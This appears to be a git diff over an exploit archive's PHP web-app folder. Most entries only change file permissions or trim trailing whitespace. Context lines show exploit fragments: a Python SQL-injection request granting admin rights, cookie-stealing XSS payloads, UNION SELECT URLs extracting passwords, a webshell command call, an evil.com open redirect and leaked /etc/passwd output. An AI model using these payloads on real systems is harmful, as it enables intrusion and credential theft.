a/platforms/php/webapps/18110.txt b/platforms/php/webapps/18110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18111.php b/platforms/php/webapps/18111.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18114.txt b/platforms/php/webapps/18114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18115.txt b/platforms/php/webapps/18115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18118.txt b/platforms/php/webapps/18118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18121.txt b/platforms/php/webapps/18121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18126.txt b/platforms/php/webapps/18126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18127.txt b/platforms/php/webapps/18127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18128.txt b/platforms/php/webapps/18128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18129.txt b/platforms/php/webapps/18129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18131.txt b/platforms/php/webapps/18131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18132.php b/platforms/php/webapps/18132.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1814.txt b/platforms/php/webapps/1814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18149.php b/platforms/php/webapps/18149.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18151.php b/platforms/php/webapps/18151.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18155.txt b/platforms/php/webapps/18155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18156.txt b/platforms/php/webapps/18156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1816.php b/platforms/php/webapps/1816.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18167.zip b/platforms/php/webapps/18167.zip old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1817.txt b/platforms/php/webapps/1817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18177.txt b/platforms/php/webapps/18177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1818.txt b/platforms/php/webapps/1818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18185.txt b/platforms/php/webapps/18185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18192.txt b/platforms/php/webapps/18192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18193.txt b/platforms/php/webapps/18193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18198.php b/platforms/php/webapps/18198.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18202.txt b/platforms/php/webapps/18202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18207.txt b/platforms/php/webapps/18207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1821.php b/platforms/php/webapps/1821.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18210.txt b/platforms/php/webapps/18210.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18212.txt b/platforms/php/webapps/18212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18213.php b/platforms/php/webapps/18213.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18214.py b/platforms/php/webapps/18214.py index de0a5c652..62c3a3185 100755 --- a/platforms/php/webapps/18214.py +++ b/platforms/php/webapps/18214.py @@ -342,4 +342,4 @@ class killsmf: conn = HTTPConnection(target,port) conn.request("POST", path + "index.php?debug;action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label_name[0]" : "o rly" + unquote("%a3%27"),"label_name[1]" : "ID_GROUP=1 WHERE/*", "label_name[2]" : "*/ID_MEMBER=" + uid + "/*", "save" : "Save", "sc" : self.sesc, "db_character_set": "big5"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + "; 1102461922=1; -1283274824=1;"}) -killsmf() \ No newline at end of file +killsmf() \ No newline at end of file diff --git a/platforms/php/webapps/18215.txt b/platforms/php/webapps/18215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18217.txt b/platforms/php/webapps/18217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18218.txt b/platforms/php/webapps/18218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18222.txt b/platforms/php/webapps/18222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18224.php b/platforms/php/webapps/18224.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1823.txt b/platforms/php/webapps/1823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18230.txt b/platforms/php/webapps/18230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18231.txt b/platforms/php/webapps/18231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18232.txt b/platforms/php/webapps/18232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18233.txt b/platforms/php/webapps/18233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18236.txt b/platforms/php/webapps/18236.txt old mode 100755 new mode 100644 index 0e32643a0..fc95ba331 --- a/platforms/php/webapps/18236.txt +++ b/platforms/php/webapps/18236.txt @@ -15,16 +15,4 @@ e-mail: <input type="Text" name="email" id="email" size="15"/> <br>web(optional): <input type="Text" name="web" id="web" size="15"/><br> comment: <input type="Text" name="comment" id="comment" size="15"/><br> <input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/> -<input type="Hidden" name="post" id="post" value="1"/></form> - - - - - - - - - - - - \ No newline at end of file +<input type="Hidden" name="post" id="post" value="1"/></form> \ No newline at end of file diff --git a/platforms/php/webapps/1824.txt b/platforms/php/webapps/1824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18246.txt b/platforms/php/webapps/18246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18249.txt b/platforms/php/webapps/18249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1825.txt b/platforms/php/webapps/1825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18250.txt b/platforms/php/webapps/18250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18251.txt b/platforms/php/webapps/18251.txt old mode 100755 new mode 100644 index bc944cfb8..c95a3ddec --- a/platforms/php/webapps/18251.txt +++ b/platforms/php/webapps/18251.txt @@ -24,4 +24,4 @@ # ################################################################################################ # ( Vulnerability Researcher ) -################################################################################################ \ No newline at end of file +################################################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/18259.txt b/platforms/php/webapps/18259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1826.txt b/platforms/php/webapps/1826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18261.txt b/platforms/php/webapps/18261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18265.txt b/platforms/php/webapps/18265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1827.txt b/platforms/php/webapps/1827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18274.txt b/platforms/php/webapps/18274.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18276.txt b/platforms/php/webapps/18276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18277.txt b/platforms/php/webapps/18277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1828.txt b/platforms/php/webapps/1828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18287.php b/platforms/php/webapps/18287.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18288.txt b/platforms/php/webapps/18288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1829.txt b/platforms/php/webapps/1829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18290.txt b/platforms/php/webapps/18290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18292.txt b/platforms/php/webapps/18292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18293.txt b/platforms/php/webapps/18293.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18297.txt b/platforms/php/webapps/18297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18298.txt b/platforms/php/webapps/18298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18300.txt b/platforms/php/webapps/18300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18308.txt b/platforms/php/webapps/18308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18314.txt b/platforms/php/webapps/18314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1832.txt b/platforms/php/webapps/1832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18320.txt b/platforms/php/webapps/18320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18322.txt b/platforms/php/webapps/18322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18330.txt b/platforms/php/webapps/18330.txt old mode 100755 new mode 100644 index 99ffb6da4..5df948b5e --- a/platforms/php/webapps/18330.txt +++ b/platforms/php/webapps/18330.txt @@ -21,5 +21,4 @@ The final download link will be replaced with [REDIRECT-TO-URL] - POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script> - \ No newline at end of file + POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/18335.txt b/platforms/php/webapps/18335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18338.txt b/platforms/php/webapps/18338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18340.txt b/platforms/php/webapps/18340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18341.txt b/platforms/php/webapps/18341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18342.txt b/platforms/php/webapps/18342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18344.txt b/platforms/php/webapps/18344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18347.txt b/platforms/php/webapps/18347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18348.txt b/platforms/php/webapps/18348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1835.txt b/platforms/php/webapps/1835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18350.txt b/platforms/php/webapps/18350.txt old mode 100755 new mode 100644 index 02cb8fa30..498e73b3e --- a/platforms/php/webapps/18350.txt +++ b/platforms/php/webapps/18350.txt @@ -15,6 +15,4 @@ age_month: 1 age_year: 1970 - Direct redirect to http://www.evil.com - - \ No newline at end of file + Direct redirect to http://www.evil.com \ No newline at end of file diff --git a/platforms/php/webapps/18352.txt b/platforms/php/webapps/18352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18353.txt b/platforms/php/webapps/18353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18355.txt b/platforms/php/webapps/18355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18356.txt b/platforms/php/webapps/18356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18357.txt b/platforms/php/webapps/18357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18374.txt b/platforms/php/webapps/18374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18380.txt b/platforms/php/webapps/18380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18383.txt b/platforms/php/webapps/18383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18384.txt b/platforms/php/webapps/18384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18385.txt b/platforms/php/webapps/18385.txt old mode 100755 new mode 100644 index 83ad507ac..2ad76d88b --- a/platforms/php/webapps/18385.txt +++ b/platforms/php/webapps/18385.txt @@ -17,4 +17,4 @@ [+] Injectable http://[host]/[path]/gamebase/?action=detail&gameid=1+union+select+1,2,3,4,5,nick, - pwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+dzcp_users+where+id=1--+ \ No newline at end of file + pwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+dzcp_users+where+id=1--+ \ No newline at end of file diff --git a/platforms/php/webapps/18386.txt b/platforms/php/webapps/18386.txt old mode 100755 new mode 100644 index 10f0accf0..ad043c03b --- a/platforms/php/webapps/18386.txt +++ b/platforms/php/webapps/18386.txt @@ -25,4 +25,4 @@ http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=2--+ -[-] The SQL Injection Filter Function must be bypassed () \ No newline at end of file +[-] The SQL Injection Filter Function must be bypassed () \ No newline at end of file diff --git a/platforms/php/webapps/18389.txt b/platforms/php/webapps/18389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1839.txt b/platforms/php/webapps/1839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18390.txt b/platforms/php/webapps/18390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18392.php b/platforms/php/webapps/18392.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18403.txt b/platforms/php/webapps/18403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18407.txt b/platforms/php/webapps/18407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1841.txt b/platforms/php/webapps/1841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18410.txt b/platforms/php/webapps/18410.txt old mode 100755 new mode 100644 index a1b75866d..175812533 --- a/platforms/php/webapps/18410.txt +++ b/platforms/php/webapps/18410.txt @@ -74,4 +74,4 @@ $filename = "content/".$pagename.".txt"; <= .php%00 Don't Forget Referer : http://site/index.php?page=1 [ ! ] http://site/content/thnks-ahwak2000-cyber-crystal.php?cmd=uname-a # Thnks to all Stupid Coder - # The End \ No newline at end of file + # The End \ No newline at end of file diff --git a/platforms/php/webapps/18412.php b/platforms/php/webapps/18412.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18413.txt b/platforms/php/webapps/18413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18417.txt b/platforms/php/webapps/18417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18418.html b/platforms/php/webapps/18418.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18419.html b/platforms/php/webapps/18419.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1842.htm b/platforms/php/webapps/1842.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18422.txt b/platforms/php/webapps/18422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18428.txt b/platforms/php/webapps/18428.txt old mode 100755 new mode 100644 index 77761f978..e152a5a40 --- a/platforms/php/webapps/18428.txt +++ b/platforms/php/webapps/18428.txt @@ -68,4 +68,4 @@ http://localhost/Dasher.php # [~](>D!R 4ll 0R D!E<) #; # -[~]--------------------------------------------------------------------------------------------- \ No newline at end of file +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/1843.txt b/platforms/php/webapps/1843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18432.txt b/platforms/php/webapps/18432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18434.txt b/platforms/php/webapps/18434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18435.txt b/platforms/php/webapps/18435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18438.txt b/platforms/php/webapps/18438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18439.txt b/platforms/php/webapps/18439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1844.txt b/platforms/php/webapps/1844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18441.txt b/platforms/php/webapps/18441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18443.txt b/platforms/php/webapps/18443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18444.txt b/platforms/php/webapps/18444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18455.txt b/platforms/php/webapps/18455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18456.txt b/platforms/php/webapps/18456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1846.txt b/platforms/php/webapps/1846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18464.html b/platforms/php/webapps/18464.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18465.txt b/platforms/php/webapps/18465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18466.txt b/platforms/php/webapps/18466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18467.txt b/platforms/php/webapps/18467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18468.html b/platforms/php/webapps/18468.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1847.txt b/platforms/php/webapps/1847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18470.txt b/platforms/php/webapps/18470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1848.txt b/platforms/php/webapps/1848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18480.txt b/platforms/php/webapps/18480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18483.txt b/platforms/php/webapps/18483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18487.html b/platforms/php/webapps/18487.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18494.txt b/platforms/php/webapps/18494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18495.html b/platforms/php/webapps/18495.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18497.txt b/platforms/php/webapps/18497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18498.html b/platforms/php/webapps/18498.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18502.html b/platforms/php/webapps/18502.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18506.txt b/platforms/php/webapps/18506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18508.txt b/platforms/php/webapps/18508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1851.txt b/platforms/php/webapps/1851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18513.txt b/platforms/php/webapps/18513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18516.txt b/platforms/php/webapps/18516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18519.txt b/platforms/php/webapps/18519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18522.php b/platforms/php/webapps/18522.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18523.txt b/platforms/php/webapps/18523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18526.php b/platforms/php/webapps/18526.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18527.txt b/platforms/php/webapps/18527.txt old mode 100755 new mode 100644 index b6a40917e..01273b184 --- a/platforms/php/webapps/18527.txt +++ b/platforms/php/webapps/18527.txt @@ -52,5 +52,4 @@ Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attac </form> </body> </html> -+--------------------------------------------------------------------------------------------------------------------------------+ - \ No newline at end of file ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/platforms/php/webapps/1853.php b/platforms/php/webapps/1853.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18536.txt b/platforms/php/webapps/18536.txt old mode 100755 new mode 100644 index 784fbf710..c9eb94fdd --- a/platforms/php/webapps/18536.txt +++ b/platforms/php/webapps/18536.txt @@ -58,5 +58,4 @@ administrator account and how to modify an existing and published web pages. oth </form> </body> </html> -+--------------------------------------------------------------------------------------------------------------------------------+ - \ No newline at end of file ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/platforms/php/webapps/1854.txt b/platforms/php/webapps/1854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18544.txt b/platforms/php/webapps/18544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18545.txt b/platforms/php/webapps/18545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18549.txt b/platforms/php/webapps/18549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1855.txt b/platforms/php/webapps/1855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18554.txt b/platforms/php/webapps/18554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18556.txt b/platforms/php/webapps/18556.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18558.txt b/platforms/php/webapps/18558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18559.txt b/platforms/php/webapps/18559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18560.txt b/platforms/php/webapps/18560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18561.txt b/platforms/php/webapps/18561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18563.txt b/platforms/php/webapps/18563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18564.txt b/platforms/php/webapps/18564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18571.txt b/platforms/php/webapps/18571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18574.txt b/platforms/php/webapps/18574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18575.txt b/platforms/php/webapps/18575.txt old mode 100755 new mode 100644 index baf4c5342..20f499811 --- a/platforms/php/webapps/18575.txt +++ b/platforms/php/webapps/18575.txt @@ -33,5 +33,4 @@ and unpublished. In this POC I've deleted web page with ID=2 -+------------------------------------------------------------------------------------------------------------------------------------+ - \ No newline at end of file ++------------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/platforms/php/webapps/18578.txt b/platforms/php/webapps/18578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1858.txt b/platforms/php/webapps/1858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18583.txt b/platforms/php/webapps/18583.txt old mode 100755 new mode 100644 index 3cd49bb5a..f6d236536 --- a/platforms/php/webapps/18583.txt +++ b/platforms/php/webapps/18583.txt @@ -35,4 +35,4 @@ postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:498:500::/var/www:/bi diradmin:x:497:497::/usr/local/directadmin:/bin/false mysql:x:496:496:MySQL server:/var/lib/mysql:/bin/false webapps:x:500:501::/var/www/html:/bin/false majordomo:x:495:2::/etc/virtual/majordomo:/bin/false -dovecot:x:494:494::/home/dovecot:/bin/false admin:x:501:502::/home/admin:/bin/bash \ No newline at end of file +dovecot:x:494:494::/home/dovecot:/bin/false admin:x:501:502::/home/admin:/bin/bash \ No newline at end of file diff --git a/platforms/php/webapps/18589.txt b/platforms/php/webapps/18589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18590.txt b/platforms/php/webapps/18590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18591.txt b/platforms/php/webapps/18591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18592.txt b/platforms/php/webapps/18592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18593.txt b/platforms/php/webapps/18593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18594.txt b/platforms/php/webapps/18594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18595.txt b/platforms/php/webapps/18595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18598.txt b/platforms/php/webapps/18598.txt old mode 100755 new mode 100644 index c7c4a67d0..d6ac7f65b --- a/platforms/php/webapps/18598.txt +++ b/platforms/php/webapps/18598.txt @@ -19,9 +19,4 @@ InyeXion,LinuxFer, Scorp [PoC] -http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- - - - - - \ No newline at end of file +http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- \ No newline at end of file diff --git a/platforms/php/webapps/18599.txt b/platforms/php/webapps/18599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1860.txt b/platforms/php/webapps/1860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18607.txt b/platforms/php/webapps/18607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18608.txt b/platforms/php/webapps/18608.txt old mode 100755 new mode 100644 index b93fe4ea7..6c218d280 --- a/platforms/php/webapps/18608.txt +++ b/platforms/php/webapps/18608.txt @@ -6,4 +6,4 @@ go to >> edit profile >> Display name >> and then injects the xss code instead o After inkection this code. In the main page of the webiste, there is "Users Online" menu. -This menu is by default in every page of the website. Therefore, all useres will be affected of this vulnerabiltym, and they can be redirected, or thier session could be hijacked \ No newline at end of file +This menu is by default in every page of the website. Therefore, all useres will be affected of this vulnerabiltym, and they can be redirected, or thier session could be hijacked \ No newline at end of file diff --git a/platforms/php/webapps/18609.txt b/platforms/php/webapps/18609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1861.txt b/platforms/php/webapps/1861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18613.txt b/platforms/php/webapps/18613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18614.txt b/platforms/php/webapps/18614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18616.txt b/platforms/php/webapps/18616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1863.txt b/platforms/php/webapps/1863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18631.txt b/platforms/php/webapps/18631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18632.txt b/platforms/php/webapps/18632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18639.txt b/platforms/php/webapps/18639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1864.txt b/platforms/php/webapps/1864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18644.txt b/platforms/php/webapps/18644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18647.txt b/platforms/php/webapps/18647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18648.txt b/platforms/php/webapps/18648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18649.txt b/platforms/php/webapps/18649.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1865.txt b/platforms/php/webapps/1865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18652.txt b/platforms/php/webapps/18652.txt old mode 100755 new mode 100644 index 8add8326f..30e1788f5 --- a/platforms/php/webapps/18652.txt +++ b/platforms/php/webapps/18652.txt @@ -76,5 +76,4 @@ This cms is also affected by XSS vulnerabilities in "wolfcms/admin/user/add" pag "><script>alert("XSS")</script> -+--------------------------------------------------------------------------------------------------------------------------------+ - \ No newline at end of file ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/platforms/php/webapps/18655.php b/platforms/php/webapps/18655.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1866.txt b/platforms/php/webapps/1866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18660.txt b/platforms/php/webapps/18660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18667.html b/platforms/php/webapps/18667.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18668.txt b/platforms/php/webapps/18668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18670.txt b/platforms/php/webapps/18670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18676.txt b/platforms/php/webapps/18676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1868.php b/platforms/php/webapps/1868.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18680.txt b/platforms/php/webapps/18680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18682.txt b/platforms/php/webapps/18682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18685.txt b/platforms/php/webapps/18685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18686.txt b/platforms/php/webapps/18686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18687.txt b/platforms/php/webapps/18687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18689.txt b/platforms/php/webapps/18689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1869.php b/platforms/php/webapps/1869.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18690.txt b/platforms/php/webapps/18690.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18694.txt b/platforms/php/webapps/18694.txt old mode 100755 new mode 100644 index b0bc7ca3d..b40166c7b --- a/platforms/php/webapps/18694.txt +++ b/platforms/php/webapps/18694.txt @@ -82,5 +82,4 @@ Other parameters can be also modified. </form> </body> </html> -+--------------------------------------------------------------------------------------------------------------------------------+ - \ No newline at end of file ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/platforms/php/webapps/18699.txt b/platforms/php/webapps/18699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1870.txt b/platforms/php/webapps/1870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18700.txt 